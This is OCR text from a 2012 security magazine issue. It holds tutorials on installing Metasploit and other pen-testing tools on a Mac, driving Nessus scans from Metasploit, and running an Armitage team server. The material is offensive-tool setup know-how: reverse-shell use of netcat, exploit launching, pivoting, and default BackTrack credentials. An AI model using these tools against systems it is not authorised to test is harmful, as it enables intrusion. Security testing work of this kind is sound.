line and it will untar the file into the desired di- 
rectory: 

$ sudo tar -xvf f ramework-lastest-tar.bz2 
-C /opt 

If the file was untarred for you as mentioned, 
you will need to move the Metasploit source 
file structure to the opt directory. Your directory 
structure should look like this: 

/opt/metasploit3/msf 3 

Starting Metasploit 

Now that Metasploit is installed, we will start 
Metasploit for the first time. You will need to navi- 
gate to the Metasploit directory and start Metasploit. 

• Navigate to the Metaploit directory with the fol- 
lowing syntax entered at the command line: 

$ cd /opt/metasploit/msf 3 

• To start Metasploit, simply enter the following 
syntax: 

$ sudo ./msfconsole 

You will get one of the many Metasploit 
screens like the one in Figure 2. 



msfl - ruby - 110x31 
mhy | 




Figure 2. This is one of the many Metasploit screens you will 
see when launching Metasploit 
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Connecting to the database 

In this next step we will connect Metasploit to 
our PostgreSQL data base. From the Metasploit 
prompt, type the following syntax: 

msf > db_connect msf_user : password@127 . 0 . 0 . l/msf_ 
database 

You will see the following message and you 
should be connected. 

[*] Rebuilding the module cache in the background... 

Type in the following syntax to verify the database 
is connected: 

msf > db_status 

You will get the following back verifying the data- 
base is connected: 



[*] postgresql connected to msf_database 

The database is now connected to Metasploit, but 
once you exit Metasploit the database will be dis- 
connected. To configure Metasploit to automat- 
ically connect on startup, we will have to create 
the msfconsole.rc file. 

Enter the following syntax at the command 
prompt: 

$ cat > ~/ .msf 3 /msf console . rc << EOF db_connect 

-y /opt/metasploit3/config/database . yml 
EOF 

Updating Metasploit 

Now that we have Metasploit installed and con- 
figured, we will update the Metasploit installation. 
From the command prompt, type the following syn- 
tax: 

$ ./msfupdate 

This can take a while, so just set back and let the 
update complete. Make sure to update Metasploit 
frequently so you have the latest exploits. 

The benefits of Metasploit with database 

Metasploit is installed, the database is connected 
and ready to use. So what can I do with Metasploit 
with a database that I couldn't do without one? 
Here is a list of the new functionality gained by us- 
ing a database with Metaploit. 

Here is a list of the Metasploit Database Back- 
end Commands taken directly from the Metasploit 
console: Listing 1. 

The commands are pretty much self-explanatory, 
but to it should be noted that dbjmport allows you 
to import nmap scans done outside of Metasploit. 
This comes in handy when you are working with 
others on a pen test and you want to centrally 
manage your pen test data. As mentioned earlier, 
workspace helps you manage your pen tests by al- 
lowing you to store them in separate areas of the 
database. 

A great reference guide for Metasploit can be 
found at Offensive Security's website: http://www. 
offensive-security.com/metasploit-unleashed/ 
Main _P age. 

Nmap 

Nmap is an open source network discovery and 
security auditing tool. You can run nmap within 
Metasploit, but it is good to have nmap installed so 
you can run nmap outside of Metasploit. 



Listing 1 . Database Backend Commands as displayed in 
the Metasploit console 



Database Backend Commands 



Command 
creds 

db_connect 
db_dis connect 

db_export 

db_import 

db_nmap 

db_rebuild_cache 

db_status 

hosts 
loot 
notes 
services 

vulns 

workspace 



Description 

List all credentials in the 
database 

Connect to an existing database 
Disconnect from the current 

database instance 
Export a file containing the 

contents of the database 
Import a scan result file 

(filetype will be auto-detected) 
Executes nmap and records the 

output automatically 
Rebuilds the database-stored 

module cache 

Show the current database 
status 

List all hosts in the database 
List all loot in the database 
List all notes in the database 
List all services in the 
database 

List all vulnerabilities in the 
database 

Switch between database 
workspaces 
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We will use Homebrew to install nmap. From the 
command prompt, type the following syntax: 

$ brew install nmap 

Visit the Nmap website for the Nmap reference 
guide: http://nmap.org/book/man.html. 

SQLmap 

SQLmap is a penetration testing tool that detects 
SQL injection flaws and automates SQL injection. 
From the command prompt, type the following syn- 
tax: 

$ git clone https://github.com/sqlmapproject/ 
sqlmap.git sqlmap-dev 

Burp Suite 

Burp Suite is a set of web security testing tools, in- 
cluding Burp Proxy. To install Burp Suite, download 
it from: http://www.portswigger.net/burp/download. 
html 

To run Burp, type the following syntax from the 
command prompt: 

$ java -jar -Xmxl024m burpsuite_vl . 4 . 01 . j ar 

For more information on using Burp, go to the 
Burp Suite website: http://www.portswigger.net/ 
burp/help/ 

Nessus 

Nessus is a commercial vulnerability scanner and 
it can be downloaded from the Tenable Network 
website: http://www.tenable.com/products/nessus/ 
nessus-download-agreement. 

Download the file Nessus-5.x.x.dmg.gz, and 
then double click on it to unzip it. Double click on 
the Nessus-5.x.x.dmg file, which will mount the 
disk image and make it appear under "Devices" in 
Tinder". Once the volume "Nessus 5" appears in 
"Finder", double click on the file Nessus 5. 

The Nessus installer is GUI based like other Mac 
OS X applications, so there are no special instruc- 
tions to document. The Nessus 5.0 Installation and 
Configuration Guide as well as the Nessus 5.0 Us- 
er Guide can be downloaded from the documenta- 
tion section of the Tenable Network website: http:// 
www. tenable, com/products/nessus/documenta- 
tion. 

SSLScan 

SSLScan queries SSL services, such as HTTPS, 
in order to determine the ciphers that are support- 
ed. 



To install sslscan, type the following syntax at the 
command prompt: 

$ brew install sslscan 

Wireshark 

Wireshark is a packet analyzer and can be useful 
in pen tests. 

Wireshark DMG package can be downloaded 
from the Wireshark website: http:/ /www. wireshark. 
org/download. html. 

Once the file is downloaded, double click to in- 
stall Wireshark. 

TCPDUMP 

TCPDUMP is a command line packet analyzer that 
is preinstalled on Mac OS X. For more information 
consult the man page for tcpdump, by typing the 
following syntax at the command prompt: 

$ man tcpdump 

Netcat 

Netcat is a multipurpose network utility that is pre- 
installed on Mac OS X. Netcat can be used for port 
redirection, tunneling, and port scanning to just 
name a few of the capabilities of netcat. Netcat is 
used a lot for reverse shells. For more information 
on netcat, type the following syntax at the com- 
mand prompt: 

$ man nc 

Conclusion 

Follow the instructions in this article, you will have 
a fully functional set of hacking tools installed on 
your Mac and you will be able to run them natively 
without having to start a virtual machine or deal with 
the added administrative overhead that comes with 
running a virtual machine. You will also not have to 
share resources with a virtual machine. I hope you 
found this article useful and I hope you enjoy setting 
up your Mac OS X hacker toolbox as much as I did. 
With Macs gaining popularity, I can only imagine 
they will become more widely used in pen testing. 

PHILLIPWYLIE 

Phillip Wylie is a security consul- 
tant specializing in penetration 
testing, network vulnerability as- 
^^MTkJ^^ sessments and application vul- 
Wtmm nerability assessments. Phillip has 
^^^^ ■^^^■Ifc over 8 years of experience in infor- 
mation security and 7 years of system administration 
experience. 



34 1 Exploiting Software 



09/2012 



iHf 



INTERNATIONAL MANAGEMENT FORUM 




IT Security Courses and Trainings 

IMF Academy is specialised in providing business information by means of distance 
learning courses and trainings. Below you find an overview of our IT security 

courses and trainings. 



Certified ISO27005 Risk Manager 

Learn the Best Practices in Information 
Security Risk Management with ISO 
27005 and become Certified ISO 27005 
Risk Manager with this 3-day training! 

CompTIA Cloud Essentials 
Professional 

This 2-day Cloud Computing in-company 
training will qualify you for the vendor- 
neutral international CompTIA Cloud 
Essentials Professional (CEP) certificate. 

Cloud Security (CCSK) 

2-day training preparing you for the 
Certificate of Cloud Security Knowledge 
(CCSK), the industry's first vendor-inde- 
pendent cloud security certification from 
the Cloud Security Alliance (CSA). 

e-Security 

Learn in 9 lessons how to create and 
implement a best-practice e-security 
policy! 

TOGAF 
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Information Security Management 

Improve every aspect of your information 
security! 

SABSA Foundation 

The 5-day SABSA Foundation training 
provides a thorough coverage of the 
knowlegde required for the SABSA 
Foundation level certificate. 

SABSA Advanced 

The SABSA Advanced trainings will 
qualify you for the SABSA Practitioner 
certificate in Risk Assurance & Govern- 
ance, Service Excellence and/or Architec- 
tural Design. You will be awarded with 
the title SABSA Chartered Practitioner 
(SCP). 

TOGAF 9 and ArchiMate Foundation 

After completing this absolutely unique 
distance learning course and passing 
the necessary exams, you will receive 
the TOGAF 9 Foundation (Level 1) and 
ArchiMate Foundation certificate. 



CLOUD 

ESSENTIALS- 



ArchiMate® 



For more information or to request the brochure 
please visit our website: 

http : / / www, imf academy, com/ partner/hakin9 

IMF Academy 




info@imfacademy.com 
Tel: +31 (0)40 246 02 20 
Fax: +31 (0)40 246 00 17 
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How to Scan 

with Nessus from within Metasploit 



When you perform a penetration test with Metasploit you 
sometimes import vulnerability scanning results for example Nessus 
Vulnerability Scanner. Usually you start the scan externally from 
Metasploit framework and then import the results into Metasploit. 



What you can do is to manage the Nessus 
scan from within Metasploit and easily 
import the results into your process. But 
let's start from the beginning. 

What you should know 

To get the most of this article you should have a 
working (and preferably updated) BackTrack 5 R3 
system, 32-bit or 64-bit shouldn't matter but I per- 
sonally run a 32-bit system in a virtual machine. 
This article makes extensive use of the command 
line so you should preferably be familiar with that. 

What you will learn 

After reading this article you should know how to 
run a Nessus scan both from the Nessus console 
and, more importantly, from within the Metasploit 
Framework. 

Installing Nessus on BackTrack 5 R3 

To run a Nessus vulnerability scan from the 
Metasploit console you first need to have a Nes- 
sus installation somewhere. Please refer to http:// 
www. tenable, com/products/nessus/nessus-prod- 
uct-overview for download and installation instruc- 
tions. I'll wait while you install it, and don't forget to 
register your installation so you can download the 
latest plugins for it. 

Downloading 

To download Nessus vulnerability scanner go to 



http://www.nessus.org and download the Ubuntu 
11.10 version for your architecture (32-bit or 64- 
bit). 

Installing 

Install Nessus by running 
32-bit 

# dpkg --install Nessus-5 . 0 . l-ubuntulll0_i386 . deb 

64-bit 

# dpkg --install Nessus-5 . 0 . l-ubuntulll0_amd64 . deb 



<* hack f track P, 




Figure 1. Registering Nessus 
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Configuring 

First you need to register for a feed, which is how 
you get updated plugins very much like an antivi- 
rus gets updated definitions. For home user there 
is a free personal feed and for organizations and 
security professionals there is a professional feed 
which is very affordable (at the time of writing it is 
USD$1200 per year, which makes it USD$100 per 
month). If your organization can't afford that then 
you are in serious trouble. 

Once you got your feed registration it is time to 
register Nessus (Figure 1). 

# nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX 

Finally create a user for Nessus: Figure 2 and 
Listing 1. 

Running Nessus 

Start Nessus by running 

# /etc/init . d/nessusd start 



good idea unless you know why you get the warn- 
ing and the implications of it). 

Using Metasploit Framework and Nessus 
together 

Scanning the local network 

Let's scan the local network for vulnerable systems 
(Figure 3). 

After filling out the required information you can 
start the scan. Time to grab some coffee... De- 
pending on the size of the target network the scan 
process can take anything from a few minutes to 
hours... (Figure 4). 

Once the scan is finished you can browse the 
report and download it so you can import it into 
Metasploit (Figure 5). 

Manually importing Nessus results into 
Metasploit 

Once you have a Nessus report you can download 
it in .nessus XML format (recommended) and im- 
port it using db import command: Listing 2. 



You can access the Nessus console by going to 
https://<ip address>:8834/. You will be presented 
with a certificate warning because the SSL-cer- 
tificate is self-signed. Click through the warning 
message to access the console (generally not a 

Listing 1 . Create a user for Nessus 

# nessus-adduser 
Login : msf 
Password : 
Password (again) : 

Do you want this user to be a Nessus 'admin' 
user ? (can upload plugins , etc..) (y/n) [n] : y 





Figure 3. Scanning the local network for vulnerable systems 




Figure 2. Create a user for Nessus 



Figure 4. The span of time needed to scan with Nessus 
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msf> db_import /path/to/report . nessus 

But that means that you need to run the scan first 
the scan and then import it to Metasploit... 

Run Nessus from within Metasploit Framework 

A much cooler feature is to run the vulnerability 
scan directly from your Metasploit console, using 
the information you already collected about the tar- 
get network. 



Listing 2. Importing a Nessus report 

msf> db_import 

Usage: db_import <filename> [file2...] 
Filenames can be globs like *.xml, or **/*.xml 
which will search recursively 
Currently supported file types include 

Acunetix XML 

Amap Log 

Amap Log -m 

Appscan XML 

Burp Session XML 

Foundstone XML 

IP360 ASPL 

IP360 XML v3 

Microsoft Baseline Security Analyzer 
Nessus NBE 

Nessus XML vl and v2) 
NetSparker XML 
NeXpose Simple XML 
NeXpose XML Report 
Nmap XML 
OpenVAS Report 
Qualys Asset XML 
Qualys Scan XML 
Retina XML 
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Figure 5. Browsing and downloading the report 



Load Nessus plugin 

In Metasploit you start with loading the nessus plu- 
gin: 

msf> load nessus 

and then connect to the Nessus installation 

Connect Metasploit to Nessus server 

Listing 3. 

msf> nessus_connect user :password@localhost : 8834 ok 

If you save the credentials using 



msf> nessus save 



Listing 3. Connecting Metasploit to Nessus server 


msf> nessus connect -h 


[*] 


You must do this before any other commands. 


[*] 


Usage : 


[*] 


nessus connect username : password@ 




hostname :port <ssl ok> 


[*] 


Example : :> nessus connect 




msf :msf@192. 168. 1.10:8834 ok 


[*] 


OR 


[*] 


nessus connect username@ 




hostname : port <ssl ok> 


[*] 


Example :> nessus connect 




msf@192. 168. 1.10:8834 ok 


[*] 


OR 


[*] 


nessus connect hostname :port <ssl 




ok> 


[*] 


Example :> nessus connect 




192.168.1.10:8834 ok 


[*] 


OR 


[*] 


nessus connect 


[*] 


Example > nessus connect 


[*] 


This only works after you have saved creds 


[*] 


with nessus save 


[*] 


username and password are the ones you use 




to login to the nessus web 




front end 


[*] 


hostname can be an ip address or a dns 




name of the web front end. 


[*] 


The "ok" on the end is important. It is a 




way of letting you 


[*] 


know that nessus used a self signed cert 




and the risk that presents. 
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Listing 4. Selecting a policy 

msf> nessus_policy_list 
[+] Nessus Policy List 

[ + ] 

[+] ID Name 

-1 Web App Tests 

-2 Internal Network Scan 

-3 Prepare for PCI DSS audits 

-4 External Network Scan 

Listing 5. Starting the scan 



msf> nessus_scan_new -h 
Usage 

nessus_scan_new <policy id> <scan 
name> <targets> 
Example :> nessus_scan_new 1 "My Scan" 
192.168.1.250 

*] Creates a scan based on a policy id and 
targets . 

[*] use nessus_policy_list to list all 
available policies 

Listing 6. Importing the scan's results into Metasploit 

msf> nessus_report_list 
msf> nessus_report_get -h 
[*] Usage 

[*] nessus_report_get <report id> 

[*] Example :> nessus_report_get f0eabba3- 

4065-7d54-5763- 

fl91e98eb0f7f9f33db7e75a0 6ca 

[*] 

[*] This command pulls the provided report 

from the nessus server in the 
nessusv2 format 

[*] and parses it the same way db_import_ 
nessus does. After it is 
parsed it will be 

[*] available to commands such as db_hosts, 
db_vulns, db_services and 
db_autopwn . 

[*] Use;; nessus_report_list to obtain a list 
of report id' s 

msf> nessus_report_get f0eabba3- 
4065-7d54-5763- 
fl91e98eb0f7f9f33db7e75a0 6ca 



You only need to issue 

msf> nessus_connect 

to automatically connect to your Nessus instance. 
Be warned, your Nessus credentials are stored in 
the clear in ~/.msf4/nessus.yami - but it saves on 
typing- 
Configuring Nessus from Metasploit 
After you have connected to the Nessus scan it is 
time to scan the target. First we need to select a 
policy: Listing 4. 

Unfortunatly, you can't create Nessus scan poli- 
cies from the Metasploit plugin and you are forced 
to use the flash-based web GUI. This shouldn't 
be a big problem as creating policies is done far 
less often than performing vulnerability scans with 
them. 

Scan with Nessus from within Metasploit 

Then we need to start the scan: Listing 5. 

msf> nessus_scan_new -4 "Metasploit Scan" 
192.168.1.0/24 

Importing the Nessus results into Metasploit 

Once the scan is completed it is time to import the 
result into Metasploit (Listing 6.) 

After which it is time to check what we now know 
about our target network using the "hosts", "servic- 
es" and "vulns" commands in the Metasploit con- 
sole. 

Final thoughts 

Integrating Nessus vulnerability scan into 
Metasploit has several positive effects, like using 
Metasploit as the central repository for the current 
penetration test project and being able to share the 
information between team members when used 
in conjunction with Armitage (thus allowing multi- 
player Metasploit). 



MICHAEL BOMAN 

i Michael Boman is a penetration tester by 
day and a malware researcher by night. 
Michael has more than 10 years experi- 
ence in security testing of applications and 
infrastructure. He also deliver courses in 
security testing and secure development. 
Michael is passionate about computer security and doing 
his best so that more people do it right from start. You can 
find him at his website http://michaelboman.org where 
he tries to share his experiences whenever he can. 
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How to Use Multiplayer 

Metasploit with Armitage 



Metasploit is a very cool tool to use in your penetration testing: add 
Armitage for a really good time. Penetration test engagements are 
more and more often a collaborative effort with teams of talented 
security practitioners rather than a solo effort. 



Armitage is a scriptable red team (that is what 
the offensive security teams are called) col- 
laboration tool for Metasploit that visualiz- 
es targets, recommends exploits, and exposes the 
advanced post-exploitation features in the frame- 
work. 

Through one Metasploit/Armitage Server in- 
stance, your team can: 

• Use the same sessions 

• Share hosts, captured data, and downloaded 
files 

• Communicate through a shared event log (very 
similar to a IRC chat if you are familiar with 
those) 

• Run bots to automate red team tasks 

What you should know 

To get the most of this article you should have a 
working (and preferably updated) BackTrack 5 R3 
system, 32-bit or 64-bit shouldn't matter but I per- 
sonally run a 32-bit system in a virtual machine. 

This article makes extensive use of the com- 
mand line so you should preferably be familiar with 
that. You should also have a workstation that can 
run the Armitage java GUI, which either can be the 
BackTrack computer in X-windows or a separate 
computer running Linux, OSX or Windows which 
can reach the BackTrack machine via the network. 

Armitage's red team collaboration setup is CPU 
sensitive and it likes RAM. Make sure you give 



the virtual machine (or physical machine) at least 
1 .5GB of RAM to your BackTrack 5 R3 team serv- 
er. 

What you will learn 

After reading this article you should know how to 
run a Armitage server and have several clients 
connected to it for multiplayer Metasploit, meaning 
running red teams with more than a single member 
on the same Metasploit server. 

Installation 

I will base this article on BackTrack 5 R3, so get 
that from http://www.backtrack-linux.org/. After 
you have downloaded and booted it you need to 
start with connecting it to the network and update 
Metasploit Framework. The default username/ 
password for BackTrack 5 is "root" / "toor"("root" 
spelled backwards). 

Update BackTrack and Metasploit 

Before we begin we should update BackTrack to 
get the latest fixes by running 

# apt-get update 

# apt-get dist-upgrade 

We should also update the Metasploit Framework 
by running 

# msfupdate 
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#/ /bin/sh 

### BEGIN IN IT INFO 

# Provides: 

# Required-Start : 

# Required-Stop : 

# Default-Start: 

# Default-Stop: 

# Short-Description 

# Description: 



Armitage TeamServer 

Armitage TeamServer for true Multiplayer Metasploit 



armitage-teamserver 



2 3 4 5 



0 16 



# 

### END IIVIT INFO 

# Author: Michael Boman <michael@michaelboman . org> 
# 

PATH=/sbin /usr/sbin /bin /usr/bin /usr/local/sbin : /usr/local/bin 

DESC="Armitage TeamServer" 

NAME=teamserver 

ARMITAGE_DIR=/opt /metasploit /msf 3 /data/armitage 
DAEMON= $ ARM I T AGE_D I R / $ NAME 

DAEMON_ARGS="172 .16.109.130 MySecretPassword" 
PIDFILE=/var/ run/ $NAME .pid 
SCRIPTNAME=/ etc/ init . d/ $NAME 

# Exit if the package is not installed 
[ -x DAEMON" ] | | exit 0 

# Read configuration variable file if it is present 
-r /etc/default/$NAME J && . / etc/ default/ $NAME 

# Load the VERBOSE setting and other rcS variables 
. /lib/init/vars . sh 

# Define LSB log_* functions . 

# Depend on lsb-base (>= 3.0-6) to ensure that this file is present. 
. /lib/lsb/init-functions 

# 

# Function that starts the daemon/service 
# 

do_start ( ) 

{ 

# Return 

# 0 if daemon has been started 

# 1 if daemon was already running 

# 2 if daemon could not be started 

start-stop-daemon --start --quiet — pidfile $PIDFILE --exec $ DAEMON --chdir $ARMITAGE_DIR --test 
> /dev/null \ 

| | return 1 

start-stop-daemon --start --quiet --pidfile $PIDFILE — exec $ DAEMON — chdir 
$ DAEMON ARGS \ 



www.hakin9.org/en 



Exploiting Software 



NETWORK SCANNING 



Listing lb. Updating the Metasploit Framework 

| return 2 

} 

# 

# Function that stops the daemon/service 
# 

do_stop ( ) 

{ 

# Return 

# 0 if daemon has been stopped 

# 1 if daemon was already stopped 

# 2 if daemon could not be stopped 

# other if a failure occurred 

start-stop-daemon --stop — quiet — retry=TERM/ 30/KILL/ 5 — pidfile $PIDFILE — name $NAME 
RETVAL="$?" 

[ "$RETVAL" = 2 ] && return 2 

# Wait for children to finish too if this is a daemon that forks 

# and if the daemon is only ever run from this initscript . 

# If the above conditions are not satisfied then add some other code 

# that waits for the process to drop all resources that could be 

# needed by services started subsequently . A last resort is to 

# sleep for some time. 

start-stop-daemon — stop --quiet --oknodo — retry=0/30/KILL/5 — exec $DAEMON 
[ "$?" = 2 ] && return 2 

# Many daemons don f t delete their pidfiles when they exit. 
rm -f $PIDFILE 

return "$RETVAL" 

} 

# 

# Function that sends a SIGHUP to the daemon/service 
# 

do_reload() { 
# 

# If the daemon can reload its configuration without 

# restarting (for example f when it is sent a SIGHUP) r 

# then implement that here. 
# 

start-stop-daemon — stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME 
return 0 

} 

case in 
start) 

[ "$VERBOSE" != no && log_daemon_msg ''Starting $DESC" "$NAME" 

do_start 

case "$?" in 

0 | 1 ) [ " $ VERBOSE" != no ] && log_end_msg 0 ;; 

2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; 

stop) 
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[ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" 

do_stop 

case "$?" in 

0 | 1 ) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 

2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; 
esac 

status) 

status_of_proc "$ DAEMON" "$NAME " && exit 0 | | exit $? 

#reload\ force-reload) 
# 

# If do_reload ( ) is not implemented then leave this commented out 

# and leave ' force-reload' as an alias for ^restart' . 
# 

#log_daemon_msg "Reloading $DESC" "$NAME" 

#do_reload 

#log_end_msg $? 

#;; 

restart | force-reload) 
# 

# If the "reload" option is implemented then remove the 

# y force-reload' alias 
# 

log_daemon_msg "Restarting $DESC" "$NAME " 
do_stop 
case "$?" in 
Oil) 

do_start 

case "$?" in 

0) log_end_msg 0 ;; 

1) log_end_msg 1 ;; # Old process is still running 
*) log_end_msg 1 ;; # Failed to start 

esac 

*) 

# Failed to stop 
log_end_msg 1 

esac 
*) 

echo "Usage: $SCRIPTNAME { start | stop | status | restart | force-reload} " >&2 
exit 3 
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Once that is done we are ready to get Armitage 
running. 

Configuring Armitage 

Before you can use Armitage you need to config- 
ure it and make sure it is running (and create start- 
up-scripts so it is always started when the system 
boots up). 

To begin with we need a shared secret (also known 
as a password) that is the gatekeeper between your 
Armitage server and its clients. Anyone who knows 
this password can access your server and access 
the results your have collected, including active 
sessions. Take care when choosing this password, 
although for this article I will chose a password that 
is not considered secure but is easy to read. 

Manually start Armitage Teamserver 

To manually start Armitage Teamserver you first 
need to move to the Armitage directory which is 

(in BackTrack 5 R3) /opt/metasploit/msf3/data/ 

armitage by running: 

# cd /opt/metasploit/msf 3/data/armitage 

And then to start the Armitage Teamserver you 

need to run ./te amserver <my-ip-address> 

<password> like this: 

# ./teamserver 172.16.109.130 MySecretPassword 

Creating start-up scripts for Armitage 

To start the Armitage Team Server for true multi- 
player Metasploit you need to create a startup 
script. As of this moment the correct way to start 
a Armitage team server on BackTrack 5 R3 is like 
this: Listing 1. 
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Start Armitage server automatically at boot 

Add the Armitage to automatically start at boot with 
the following command: 

# update-rc . d armitage -teamserver defaults 

Using Armitage 

Connecting Armitage client to the Server. 
Using Armitage GUI 

The Armitage GUI has three main panels: modules 
(top to the left), targets (top to the right) and tabs 
(bottom), which can be resized to your liking. 

Modules 

The module browser lets you launch a Metasploit 
auxiliary module, throw an exploit, generate a pay- 
load, and run a post-exploitation module. Click 
through the tree to find the desired module. Dou- 
ble-click the module to open a module launch dia- 
log. 

Armitage will configure the module to run against 
the selected hosts. This works for auxiliary mod- 
ules, exploits, and post modules. 

Running a module against multiple hosts is one 
of the big advantages of Armitage. In the Metasploit 
console, you must configure and launch an exploit 
and post modules for each host you're working 
with while in the Armitage GUI most of the module 
settings are already populated. 

You can search modules too. Click in the search 
box below the tree, type a wildcard expression 
(e.g., ssh_*), and press enter. The module tree will 
show the search results, expanded for quick view- 
ing. Clear the search box and press enter to re- 
store the module browser to its original state. 

Targets - Graph View 

The targets panel shows your targets to you. Ar- 
mitage represents each target as a computer with 
its IP address and other information about it below 




|_ ■ *Ji Q 

Figure 1 . Armitage client connection window Figure 2. Description of the Armitage user interface 
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the computer. The computer screen shows the op- 
erating system the computer is running (Figure 2). 

A red computer with electrical jolts indicates a 
compromised host. 

A directional green line indicates a pivot from one 
host to another. Pivoting allows Metasploit to route 
attacks and scans through intermediate hosts. A 
bright green line indicates the pivot communication 
path is in use. 

Click a host to select it. You may select multiple 
hosts by clicking and dragging a box over the de- 
sired hosts. 

Right-click a host to bring up a menu with avail- 
able options. The attached menu will show attack 
and login options, menus for existing sessions, 
and options to edit the host information. 

The login menu is only available after a port scan 
reveals open ports that Metasploit can use. The 
Attack menu is only available after finding attacks 
through the Attacks menu at the top of Armitage. 
Shell and Meterpreter menus show up when a 
shell or Meterpreter session exists on the selected 
host. 

Several keyboard shortcuts are available in the 
targets panel. To edit these, go to Armitage -> Pref- 
erences. 

• Ctrl Plus - zoom in 

• Ctrl Minus - zoom out 

• Ctrl 0 - reset the zoom level 

• Ctrl A - select all hosts 

• Escape - clear selection 

• Ctrl C - arrange hosts into a circle 

• Ctrl S - arrange hosts into a stack 

• Ctrl H - arrange hosts into a hierarchy. This 
only works when a pivot is set up. 

• Ctrl P - export hosts into an image 

Right-click the target area with no selected hosts 
to configure the layout and zoom level of the tar- 
get area. 

Targets - Table View 

If you have a lot of hosts, the graph view becomes 
difficult to work with. For this situation Armitage has 
a table view. Go to Armitage -> Set Target View -> 
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Figure 3. Your preferences stored in Armitage 



Table View to switch to this mode. Armitage will re- 
member your preference (Figure 3). 

Click any of the table headers to sort the hosts. 
Highlight a row and right-click it to bring up a menu 
with options for that host. 

Armitage will highlight the IP address of any host 
with sessions. If a pivot is in use, Armitage will 
make it bold as well. 

Tabs 

Armitage opens each dialog, console, and table in 
a tab below the module and target panels. Click 
the X button to close a tab. 

You may right-click the X button to open a tab in 
a window, take a screenshot of a tab, or close all 
tabs with the same name (Figure 4). 

Hold shift and click X to close all tabs with the 
same name. Hold shift + control and click X to 
open the tab in its own window. 

You may drag and drop tabs to change their or- 
der. 

Armitage provides several keyboard shortcuts to 
make your tab management experience as enjoy- 
able as possible. Use Ctrl+T to take a screenshot 
of the active tab. Use Ctrl+D to close the active 
tab. Try Ctrl+Left and Ctrl+Right to quickly switch 
tabs. And Ctrl+W to open the current tab in its own 
window. 

Consoles 

Metasploit console, Meterpreter console, and shell 
interfaces each use a console tab. A console tab 
lets you interact with these interfaces through Ar- 
mitage. 

The console tab tracks your command history. 
Use the up arrow to cycle through previously typed 
commands. The down arrow moves back to the 
last command you typed. 

In the Metasploit console, use the Tab key to 
complete commands and parameters. This works 
just like the Metasploit console outside of Armit- 
age. 

Use Ctrl Plus to make the console font size larg- 
er, Ctrl Minus to make it smaller, and Ctrl 0 to re- 
set it. This change is local to the current console 
only. Visit Armitage -> Preferences to permanently 
change the font. 

Press Ctrl F to show a panel that will let you 
search for text within the console. 
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Figure 4. Tabs management 
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Use Ctrl A to select all text in the console's buf- 
fer. Armitage sends a use or a set PAYLOAD com- 
mand if you click a module or a payload name in 
a console. 

To open a Console go to View -> Console or 
press Ctrl+N. 

On MacOS X and Windows, you must click in the 
edit box at the bottom of the console to type. Linux 
doesn't have this problem. Always remember, the 
best Armitage experience is on Linux. 

The Armitage console uses color to draw your at- 
tention to some information. To disable the colors, 
set the console. show_colors. boolean preference 
to false. You may also edit the colors through Ar- 
mitage -> Preferences. Here is the Armitage color 
palette and the preference associated with each 
color: Figure 5. 

Logging 

Armitage logs all console, shell, and event log out- 
put for you. Armitage organizes these logs by date 
and host. You'll find these logs in the armitaqe 
folder. Go to View -> Reporting -> Acitivity Logs to 
open this folder. 

Armitage also saves copies of screenshots and 
webcam shots to this folder. 

Change the armitage log_everything boolean 
preference key to false to disable this feature. 

Edit the armitage log_data_here folder to set the 
folder where Armitage should log everything to. 
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Export Data 

Armitage and Metasploit share a database to track 
your hosts, services, vulnerabilities, credentials, 
loots, and user-agent strings captured by browser 
exploit modules. 

To get this data, go to View -> Reporting -> Export 
Data. This option will export data from Metasploit 
and create easily parsable XML and tab separated 
value (TSV) files. 

Host Management 
Dynamic Workspaces 

Armitage's dynamic workspaces feature allows 
you to create views into the hosts' database and 
quickly switch between them. Use Workspaces 
-> Manage to manage your dynamic workspaces. 
Here you may add, edit and remove workspaces 
you create (Figure 6). 

To create a new dynamic workspace, press Add. 
You will see the following dialog: Figure 7. 

Give your dynamic workspace a name. It doesn't 
matter what you call it. This description is for you. 

If you'd like to limit your workspace to hosts from 
a certain network, type a network description in 
the Hosts field. A network description might be: 
10.10.0.0/16 to display hosts between 10.10.0.0- 
10.10.255.255. Separate multiple networks with a 
comma and a space. 
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Figure 6. Managing your dynamic workspaces 
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Figure 5. Armitage color palette 



Figure 7. Creating a new dynamic workspace 
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You can cheat with the network descriptions a 
little. If you type: 192.168.95.0, Armitage will as- 
sume you mean 192.168.95.0-255. If you type: 
192.168.0.0, Armitage will assume you mean 
192.168.0.0-192.168.255.255. 

Fill out the Ports field to include hosts with cer- 
tain services. Separate multiple ports using a com- 
ma and a space. 

Use the OS field to specify which operating sys- 
tem you'd like to see in this workspace. You may 
type a partial name, such as "indows". Armitage 
will only include hosts whose OS name includes 
the partial name. This value is not case sensitive. 
Separate multiple operating systems with a com- 
ma and a space. 

Select Hosts with sessions only to only include 
hosts with sessions in this dynamic workspace. 

You may specify any combination of these items 
when you create your dynamic workspace. 

Each workspace will have an item in the Work- 
spaces menu. Use these menu items to switch 
between workspaces. You may also use Ctrl+1 
through Ctrl+9 to switch between your first nine 
workspaces. 

Use Workspaces -> Show All or Ctrl+Backspace 
to display the entire database. 

Armitage will only display 512 hosts at any given 
time, no matter how many hosts are in the data- 
base. If you have thousands of hosts, use this fea- 
ture to segment your hosts into useful target sets. 

Importing Hosts 

To add host information to Metasploit, you may im- 
port it. The Hosts -> Import Hosts menu accepts 
the following files: 

• AcunetixXML 

• Amap Log 

• Amap Log -m 

• Appscan XML 

• Burp Session XML 

• Foundstone XML 

• IP360ASPL 

• IP360XMLv3 

• Microsoft Baseline Security Analyzer 

• Nessus NBE 

• Nessus XML (v1 and v2) 

• NetSparkerXML 

• NeXpose Simple XML 

• NeXpose XML Report 

• NmapXML 

• OpenVAS Report 

• Qualys Asset XML 

• Qualys Scan XML 

• Retina XML 



You may manually add hosts with Hosts -> Add 
Hosts. 

NMap Scans 

You may also launch an NMap scan from Armitage 
and automatically import the results into Metasploit. 
The Hosts ->NMap Scan menu has several scan- 
ning options. 

Optionally, you may type db_nmap in a console 
to launch NMap with the options you choose. 
NMap scans do not use the pivots you have set up. 

MSF Scans 

Armitage bundles several Metasploit scans into 
one feature called MSF Scans. This feature will 
scan for a handful of open ports. It then enumer- 
ates several common services using Metasploit 
auxiliary modules built for the purpose. 

Highlight one or more hosts, right-click, and click 
